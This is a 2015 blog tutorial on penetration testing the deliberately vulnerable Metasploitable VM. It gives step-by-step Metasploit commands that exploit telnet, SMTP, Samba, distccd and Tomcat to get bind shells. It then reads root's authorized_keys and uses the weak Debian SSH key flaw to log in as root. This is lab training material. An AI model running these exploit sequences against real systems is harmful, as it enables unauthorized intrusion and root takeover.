Saturday, 7 November 2015

Rooting a linux box metasploit style..


Today I’ll be writing a guide on how to exploit Metasploitable with the Metasploit Framework. Who is this tutorial for? This tutorial is for anyone who is interested in beginning a journey as a Penetration Tester. This tutorial will encompass:
  • A nice overview on how to use the Metasploit Framework by searching, and using some Modules and launching Exploits.
  • It will show you how to Scan, and Exploit running services against a target using the MSF.
  • It will show you how to use 1 public exploit later explained.
This VM im booting is specifically designed to be exploited with Metasploit. But I will be using one public exploit fromhttp://www.exploit-db.com/ that I have used personally in the past.
Victims IP Address: 192.168.1.6
Attacker’s IP Address: 192.168.1.10
NOTE: BT4-R2 is what I will be using to Exploit the VM. BT-4 Final does not yield the same results, so keep that in mind. Without further ado, lets begin…
**
0x01 Enumeration
**
The most important part of any Penetration Test is Enumeration, the information you gather will be the information you will use to plan an attack against your target.
  • First lets start off with a simple Nmap Scan to reveal the open ports and running services of our target.
As Pen-Testers, we need to understand what these services do and also we need to familiarize ourselves with common running services for future Audits.
Some common services include, but are not limited to:
  • FTP
  • Telnet
  • SSH
  • IMAP
  • POP3
  • MySQL
These running services can be Daemonized and continuously show up all the majority of all targets.
Sometimes Nmap Scans will not show EVERY open port, therefore, I also ran Nessus against our target to catch what Nmap did not.
NOTE: Operating System Identification is essential for the payloads and some exploits that we will be launching. This VM is NOT windows, therefore, we need to use *nix Payloads instead of Windows Payloads if we want to get a session when the exploit succeeds.
To scan the Running Services on the Metasploitable Machine (192.168.1.6), ill be doing a SYN Stealth Scan to identify the services:
nmap -sS -sV 192.168.1.6
Code:
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
**
0x02 Exploiting Running Services
**
Based on the Nmap Scan, we can see that we have a couple Running Services.

Exploiting Telnet : Port 23
Lets being by exploiting Telnet!
  • Telnet provides an unencrypted channel between clients and the server. Attackers can take advantage of users using Telnet with ARP Cache Poisoning.
Now that we have a potentially vulnerable service, lets go to the ./msfconsole and search for the available exploits.
NOTE: Updating the Metasploit Framework will not be necessary for this video, if left un-updated, you will get the same results.
On the MSF console type search telnet
The exploit that we will be using is solaris/telnet/fuser. This is a Telnet Remote Authentication Bypass exploit for Telnet. Now in order to use that exploit one will type:
use solaris/telnet/fuser
Now we need to set the options for this exploit in order for it to work properly. To see the options you need to set you type: show options. Now continue to set the specifications for this exploit.
set RHOST 192.168.1.6
set RPORT 23
set USER bin
The default remote port is 23 and the default username to use is bin.
Now that we have everything set for the exploit, we need to choose a payload. The payload i will be using will be the cmd/unix/bind_perl. But you can pick your own by typing show payloads to see the other available payloads you can use for that exploit. To use that payload we type set payload cmd/unix/bind_perl
Now we need to set the requirements for the payload as well if its not done for you:
show options
set RHOST 192.168.1.6
Now that we have everything set, for both exploit and payload, our next step is just to simple call exploit to launch it. Typing exploit, will launch the exploit and as you can see, it was successful!

Exploiting Postfix SMTPd : Port 25
Lets continue to exploit another running service, in this case, SMTP.
  • Without going in too much detail, the Postfiix SMTP server is used to receive mail from the network. It can be heavily spammed and can also be exposed to junk mail and viruses!
On the MSF console type search smtp.
The exploit that we will be using is unix/smtp/clamav_milter_blackhole. This is a Remote Code Execution exploit for this SMTP. Now in order to use that exploit one will type:
use unix/smtp/clamav_milter_blackhole
Now, just like before, we need to set the options for this exploit in order for it to work properly. Again, see the options you need to set you type: show options, and continue to set the specifications for this exploit.
set RHOST 192.168.1.6
set RPORT 25
The default remote port is 25, but these are the only options we are interested in setting.
Now that we have everything set for the exploit, lets continue to choose a payload. The payload i will be using will be the cmd/unix/bind_ruby. Be sure to specify that’s the payload you will be utilizing by typing set payload cmd/unix/bind_ruby. Once again,we need to set the requirements for the payload.
show options
set RHOST 192.168.1.6
Now that everything is set, typing exploit will launch the exploit successfully!

Exploiting Samba SMBd 3.x : Port 139
The next service to be exploited lies on port 139.
  • Understanding networks protocols is essential to Network Penetration testing. Samba is the product name but what we need to understand is what SMB is. Service Message Block is a protocol used for sharing files and printers between computers, that’s what is for.
Lets search for samba exploits by typing search samba.
The exploit that we will be using is multi/samba/usermap_script. This exploit is used for Command Execution. Now in order to use that exploit one will type:
use multi/samba/usermap_script
Lets continue to set the exploit’s requirements that we are interested in:
set RHOST 192.168.1.6
set RPORT 139
The default remote port is 139. Now lets continue to choose our desired payload. The payload ill be using is cmd/unix/bind_ruby. Lets continue to set the payload, set the options for the payload, and launch the exploit:
set payload cmd/unix/bind_ruby
show options
set RHOST 192.168.1.6
exploit
Exploit successful

Exploiting distccd : Port 3632
Remember that Nessus Scan we did prior to exploitation? This is where we got this running service Nmap did not pick up.
  • Simply put, distcc is a program designed to distribute compiling tasks across a network to participating hosts.
The Nessus Scan Describes it as…
  • Distcc is a program to distribute builds of C, C++, Objective C or Objective C++ code across several machines on a network. Distcc should always generate the same results as a local build, is simple to install and use, and is often two or more times faster than a local compile. Distcc by default trusts its clients completely that in turn could allow a malicious client to execute arbitrary commands on the server.
Lets search for anything related with this service by typing search distccd
The exploit I’ll be using for this service is the unix/misc/distcc_exec. This is a Daemon Command Execution exploit. Now lets repeat the previous steps all in one, including choosing the payload to save time.
use unix/misc/distcc_exec
show options
set RHOST 192.168.1.6
set RPORT 3632
set payload cmd/unix/bind_ruby
show options
set RHOST 192.168.1.6
exploit
By default, the port is 3632. But as you can see, the exploit succeeded.

Exploiting Apache Tomcat/Coyote JSP Engine 1.1
I left Apache for last because i had to use an Auxiliary to get the username and password and then and exploit to break into the VM.
First lets start with the Auxiliary Module by typing search tomcat
The Auxiliary I’ll be using is the scanner/http/tomcat_mgr_login. This is to bruteforce the Tomcat Application Manager Login. So to use this we type use scanner/http/tomcat_mgr_login. Now the only options we need to set is the remote host and then launch the exploit:
set RHOSTS 192.168.1.6
exploit
If you scroll up on the green you can see that the credentials are set as tomcat:tomcat which are defaults.
Now how can we use this to our advantage? We can either go to the Daemon and log into the manager or exploit it further and get a shell.
Once again we type search tomcat and found this exploit multi/http/tomcat_mgr_deploy. This exploit is tomcat’s Application Manager Deployer Upload and Execute. Sounds good enough to test! Now lets use that exploit, set the specifications, choose a payload, set the requierments and launch the exploit
use multi/http/tomcat_mgr_deploy
show options
set RHOST 192.168.1.6
set RPORT 8180
set USERNAME tomcat
set PASSWORD tomcat
set payload generic/shell_bind_tcp
show options
set RHOST 192.168.1.6
exploit
As expected, we have a shell against the target.

Launching a Public Exploit
Now lets do some snooping around. Based on the Nmap Scan, we know that the target uses SSH so what we are interested to look for is the Authorized Keys. By default they are placed in the root.
Here is more information about SSH Authorized Keys
  • AuthorizedKeyFile specifies containing public key for public key authentication. It lists the public keys (RSA/DSA) that can be used for logging in as this user.
Lets go ahead and read this file by catting out the output:
cat /root/.ssh/authorized_keys
As you can see there is it. The exploit we are going to launch is located here:
http://www.exploit-db.com/exploits/5622/
However, we are not going to be using the code. This system have weak SSH Keys. As described in the link of the exploit, there are a certain amount of possible SSH keys, so we can bruteforce them.
Now on a new terminal, type tar jxvf to extract the Keys to the /root/ then type cd /rsa/2048
Back on the shell we have on MSF lets grab the entire key which will be:
AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkct​eZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXl​n/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ​5cCs4WocyVxsXovcNnbALTp3w
We need to find this on the Keys we extracted. Go on the terminal we type:
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkct​eZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXl​n/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ​5cCs4WocyVxsXovcNnbALTp3w *.pub
to find the exact match and make it recursive. This will find the public RSA key that we will use to authenticate as root. This is the result you get.
57c3115d77c56390332dc5c49978627a-5429.pub
All those letters and numbers is the identity file for SSH. Now we simply just type:
ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.6

No comments:

Post a Comment